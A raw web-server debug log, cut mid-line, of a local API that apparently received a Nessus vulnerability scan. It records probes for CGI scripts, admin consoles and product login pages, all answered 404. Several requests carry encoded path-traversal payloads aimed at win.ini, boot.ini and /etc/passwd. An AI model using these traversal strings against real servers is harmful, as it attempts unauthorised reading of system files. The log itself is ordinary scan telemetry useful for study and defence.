::1, resCode: 404 +2022-10-31T22:39:08.287Z debug: [1667255948286, duration: 1] GET:/api/6VrC_mDccxFp.cfm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.289Z debug: [1667255948289, duration: 0] GET:/api/cgi-bin/6VrC_mDccxFp.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.295Z debug: [1667255948293, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.297Z debug: [1667255948296, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.299Z debug: [1667255948298, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.305Z debug: [1667255948304, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.inc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.308Z debug: [1667255948307, duration: 0] GET:/api/cgi-bin/6VrC_mDccxFp.shtml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.310Z debug: [1667255948309, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.312Z debug: [1667255948311, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.314Z debug: [1667255948313, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.php3, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.318Z debug: [1667255948317, duration: 1] GET:/api/cgi-bin/6VrC_mDccxFp.cfm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.320Z debug: [1667255948319, duration: 0] GET:/api/scripts/6VrC_mDccxFp.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.325Z debug: [1667255948324, duration: 0] GET:/api/scripts/6VrC_mDccxFp.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.328Z debug: [1667255948327, duration: 1] GET:/api/scripts/6VrC_mDccxFp.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.331Z debug: [1667255948330, duration: 1] GET:/api/scripts/6VrC_mDccxFp.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.337Z debug: [1667255948336, duration: 1] GET:/api/scripts/6VrC_mDccxFp.inc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.340Z debug: [1667255948339, duration: 1] GET:/api/scripts/6VrC_mDccxFp.shtml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.344Z debug: [1667255948344, duration: 0] GET:/api/scripts/6VrC_mDccxFp.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.348Z debug: [1667255948347, duration: 1] GET:/api/scripts/6VrC_mDccxFp.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.350Z debug: [1667255948349, duration: 0] GET:/api/scripts/6VrC_mDccxFp.php3, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.353Z debug: [1667255948352, duration: 0] GET:/api/scripts/6VrC_mDccxFp.cfm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.418Z debug: [1667255948416, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.445Z debug: [1667255948444, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.543Z debug: [1667255948542, duration: 0] GET:/api/ext-js/app/common/zld_product_spec.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.589Z debug: [1667255948587, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.603Z debug: [1667255948601, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.635Z debug: [1667255948634, duration: 0] TRACE:/api/Nessus1083191035.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.663Z debug: [1667255948661, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.673Z debug: [1667255948672, duration: 0] GET:/api/xampp/index.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.702Z debug: [1667255948700, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.709Z debug: [1667255948708, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.712Z debug: [1667255948711, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.809Z debug: [1667255948808, duration: 0] GET:/api/Wsusadmin/Errors/BrowserSettings.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.016Z debug: [1667255949015, duration: 1] GET:/api/nessus345678.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.064Z debug: [1667255949062, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.090Z debug: [1667255949087, duration: 2] GET:/api/nessus345678.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.275Z debug: [1667255949273, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.287Z debug: [1667255949287, duration: 0] GET:/api/SnoopServlet/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.296Z debug: [1667255949295, duration: 0] GET:/api/snoopservlet/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.405Z debug: [1667255949404, duration: 0] GET:/api/snoop/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.413Z debug: [1667255949412, duration: 1] GET:/api/servlet/SnoopServlet/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.422Z debug: [1667255949421, duration: 1] GET:/api/servlet/snoopservlet/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.430Z debug: [1667255949429, duration: 0] GET:/api/servlet/snoop/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.486Z debug: [1667255949485, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.493Z debug: [1667255949492, duration: 1] GET:/api/robots.txt, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.527Z debug: [1667255949524, duration: 3] GET:/api/favicon.ico, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.576Z debug: [1667255949574, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.583Z debug: [1667255949582, duration: 0] GET:/api/triton-help/en/first.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.612Z debug: [1667255949610, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.619Z debug: [1667255949618, duration: 1] GET:/api/console/login/LoginForm.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.627Z debug: [1667255949626, duration: 0] GET:/api/wls-wsat/CoordinatorPortType, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.660Z debug: [1667255949659, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.669Z debug: [1667255949668, duration: 1] SEARCH:/api/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.698Z debug: [1667255949696, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.790Z debug: [1667255949789, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:09.797Z debug: [1667255949796, duration: 1] PROPFIND:/api/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.859Z debug: [1667255949858, duration: 0] GET:/api/usage/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:09.865Z debug: [1667255949864, duration: 1] GET:/api/webalizer/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.117Z debug: [1667255950115, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.164Z debug: [1667255950162, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.364Z debug: [1667255950362, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.368Z debug: [1667255950366, duration: 2] GET:/api/.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.464Z debug: [1667255950463, duration: 1] GET:/api/images, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.571Z debug: [1667255950570, duration: 1] GET:/api/.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./.%7C./winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.590Z debug: [1667255950588, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.597Z debug: [1667255950597, duration: 0] GET:/api/main_internet.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.621Z debug: [1667255950620, duration: 0] GET:/api/.../.../.../.../.../.../.../.../.../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.637Z debug: [1667255950636, duration: 0] GET:/api/.../.../.../.../.../.../.../.../.../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.642Z debug: [1667255950640, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.645Z debug: [1667255950644, duration: 1] GET:/api/.../.../.../.../.../.../.../.../.../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.650Z debug: [1667255950649, duration: 0] GET:/api/auth/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.655Z debug: [1667255950654, duration: 1] GET:/api/.../.../.../.../.../.../.../.../.../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.663Z debug: [1667255950662, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.673Z debug: [1667255950672, duration: 0] GET:/api/..../..../..../..../..../..../..../..../..../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.685Z debug: [1667255950684, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.687Z debug: [1667255950686, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.692Z debug: [1667255950692, duration: 0] GET:/api/cfg/shortcuts, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.697Z debug: [1667255950696, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.701Z debug: [1667255950701, duration: 0] GET:/api/hc/error/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.746Z debug: [1667255950744, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.751Z debug: [1667255950750, duration: 0] GET:/api/%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.754Z debug: [1667255950753, duration: 1] GET:/api/ui/login.action, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.759Z debug: [1667255950758, duration: 1] GET:/api/%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../%E2%82%AC../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.766Z debug: [1667255950765, duration: 1] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.775Z debug: [1667255950775, duration: 0] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.788Z debug: [1667255950787, duration: 1] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.789Z debug: [1667255950787, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.795Z debug: [1667255950795, duration: 0] GET:/api/%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./%C3%80.%C3%80./winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.796Z debug: [1667255950796, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.820Z debug: [1667255950817, duration: 2] GET:/api/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.835Z debug: [1667255950834, duration: 1] GET:/api/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.846Z debug: [1667255950846, duration: 0] GET:/api/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.848Z debug: [1667255950845, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.855Z debug: [1667255950854, duration: 0] GET:/api/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.856Z debug: [1667255950855, duration: 1] GET:/api/hc/admin/login/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.894Z debug: [1667255950893, duration: 1] GET:/api/..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.899Z debug: [1667255950897, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.906Z debug: [1667255950905, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.944Z debug: [1667255950943, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:10.950Z debug: [1667255950949, duration: 1] GET:/api/scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.951Z debug: [1667255950951, duration: 0] GET:/api/qip, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.958Z debug: [1667255950958, duration: 0] GET:/api/scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:10.960Z debug: [1667255950959, duration: 0] GET:/api/qip, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.005Z debug: [1667255951004, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.017Z debug: [1667255951015, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.054Z debug: [1667255951052, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.063Z debug: [1667255951062, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.096Z debug: [1667255951095, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.106Z debug: [1667255951104, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.138Z debug: [1667255951136, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.145Z debug: [1667255951144, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.173Z debug: [1667255951172, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.183Z debug: [1667255951182, duration: 0] GET:/api/portal/diag/index.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.340Z debug: [1667255951338, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.359Z debug: [1667255951359, duration: 0] GET:/api/menu.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.426Z debug: [1667255951424, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.463Z debug: [1667255951461, duration: 1] HEAD:/api/someunexistantstuff1246856010768789531.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.471Z debug: [1667255951470, duration: 1] HEAD:/api/someunexistantstuff.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.490Z debug: [1667255951489, duration: 0] GET:/api/someunexistantantsutff2146765443879179299.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.500Z debug: [1667255951499, duration: 0] GET:/api/someunexistantantsutff.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.767Z debug: [1667255951765, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.820Z debug: [1667255951818, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.828Z debug: [1667255951827, duration: 1] GET:/api/auth/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.907Z debug: [1667255951905, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:11.924Z debug: [1667255951923, duration: 0] GET:/api/ui/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.933Z debug: [1667255951932, duration: 0] GET:/api/ui/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.941Z debug: [1667255951940, duration: 1] GET:/api/recoveryconsole/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:11.987Z debug: [1667255951985, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.001Z debug: [1667255952000, duration: 1] GET:/api/VncViewer.jar, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.041Z debug: [1667255952040, duration: 1] POST:/api/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.067Z debug: [1667255952065, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.075Z debug: [1667255952073, duration: 2] GET:/api/user/index.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.145Z debug: [1667255952142, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.194Z debug: [1667255952193, duration: 0] GET:/api/pages/login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.299Z debug: [1667255952297, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.326Z debug: [1667255952325, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.365Z debug: [1667255952363, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.374Z debug: [1667255952372, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.409Z debug: [1667255952408, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.416Z debug: [1667255952416, duration: 0] GET:/api/logon.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.448Z debug: [1667255952446, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.455Z debug: [1667255952454, duration: 1] GET:/api/officescan/console/html/common/l10n/l10n.global.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.689Z debug: [1667255952687, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.761Z debug: [1667255952760, duration: 1] GET:/api/webapp/js/UI_String.en-US.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.901Z debug: [1667255952899, duration: 1] GET:/api/index.asp/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.908Z debug: [1667255952907, duration: 1] GET:/api/default.asp/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.911Z debug: [1667255952910, duration: 1] GET:/api/login.asp/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.938Z debug: [1667255952937, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:12.946Z debug: [1667255952945, duration: 0] GET:/api/nessus-check/tomcat_error_version.nasl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:12.982Z debug: [1667255952980, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.039Z debug: [1667255953038, duration: 0] GET:/api/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.077Z debug: [1667255953076, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.107Z debug: [1667255953106, duration: 0] GET:/api/tightvnc-jviewer.jar, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.154Z debug: [1667255953152, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.204Z debug: [1667255953203, duration: 1] GET:/api/VncViewer.jar, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.242Z debug: [1667255953240, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.426Z debug: [1667255953425, duration: 1] GET:/api/spotfire/about.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.459Z debug: [1667255953457, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.469Z debug: [1667255953466, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.520Z debug: [1667255953518, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.527Z debug: [1667255953526, duration: 1] GET:/api/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.534Z debug: [1667255953533, duration: 1] GET:/api/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.572Z debug: [1667255953570, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.805Z debug: [1667255953803, duration: 1] GET:/api/en/admin/aggregate.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.829Z debug: [1667255953827, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.835Z debug: [1667255953835, duration: 0] GET:/api/spywall/login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.869Z debug: [1667255953867, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:13.876Z debug: [1667255953875, duration: 0] GET:/api/brightmail/viewLogin.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:13.951Z debug: [1667255953949, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:14.001Z debug: [1667255954000, duration: 1] POST:/api/webui/apps/sdcss, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:14.294Z debug: [1667255954292, duration: 1] GET:/api/.svn/entries, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:14.387Z debug: [1667255954385, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:14.396Z debug: [1667255954395, duration: 1] GET:/api/index.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:14.405Z debug: [1667255954404, duration: 1] GET:/api/index.JSP, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:14.519Z debug: [1667255954517, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:14.581Z debug: [1667255954580, duration: 1] GET:/api/idm/login.jsp?lang=en&cntry=, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:14.689Z debug: [1667255954687, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:14.696Z debug: [1667255954695, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:14.727Z debug: [1667255954726, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:14.734Z debug: [1667255954733, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:14.764Z debug: [1667255954763, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:14.771Z debug: [1667255954770, duration: 1] GET:/api/userportal/webpages/myaccount/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:14.779Z debug: [1667255954778, duration: 1] GET:/api/webconsole/webpages/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:15.018Z debug: [1667255955016, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.026Z debug: [1667255955024, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.057Z debug: [1667255955055, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.066Z debug: [1667255955064, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.102Z debug: [1667255955100, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.183Z debug: [1667255955182, duration: 1] GET:/api/api/sonicos/is-sslvpn-enabled, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:15.268Z debug: [1667255955263, duration: 5] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.307Z debug: [1667255955306, duration: 1] GET:/api/sgms/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:15.431Z debug: [1667255955429, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.438Z debug: [1667255955437, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:15.469Z debug: [1667255955468, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.531Z debug: [1667255955529, duration: 1] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:15.540Z debug: [1667255955538, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.685Z debug: [1667255955683, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:15.756Z debug: [1667255955754, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:16.031Z debug: [1667255956030, duration: 1] GET:/api/admincp/login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:16.154Z debug: [1667255956152, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:16.162Z debug: [1667255956161, duration: 0] GET:/api/helpdesk/WebObjects/Helpdesk.woa, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:16.206Z debug: [1667255956204, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:16.214Z debug: [1667255956213, duration: 0] GET:/api/swvm/ConsoleContainer.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:16.362Z debug: [1667255956360, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:16.483Z debug: [1667255956482, duration: 0] GET:/api/Orion/Login.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:16.528Z debug: [1667255956527, duration: 1] GET:/api/Orion/Login.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:16.656Z debug: [1667255956654, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:16.719Z debug: [1667255956718, duration: 0] GET:/api/lem/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:16.899Z debug: [1667255956897, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:16.968Z debug: [1667255956966, duration: 1] POST:/api/av-centerd, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:17.009Z debug: [1667255957007, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:17.017Z debug: [1667255957016, duration: 1] GET:/api/forum/register.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:17.106Z debug: [1667255957105, duration: 0] GET:/api/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:17.179Z debug: [1667255957178, duration: 0] GET:/api/sitemap/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:17.245Z debug: [1667255957244, duration: 1] GET:/api/map/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:17.714Z debug: [1667255957713, duration: 1] GET:/api/SilverStream, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:17.792Z debug: [1667255957791, duration: 0] GET:/api/SilverStream/Meta/Tables/?access-mode=text, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:23.607Z debug: [1667255963605, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:23.615Z debug: [1667255963614, duration: 0] GET:/api/stream/0, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:23.645Z debug: [1667255963643, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 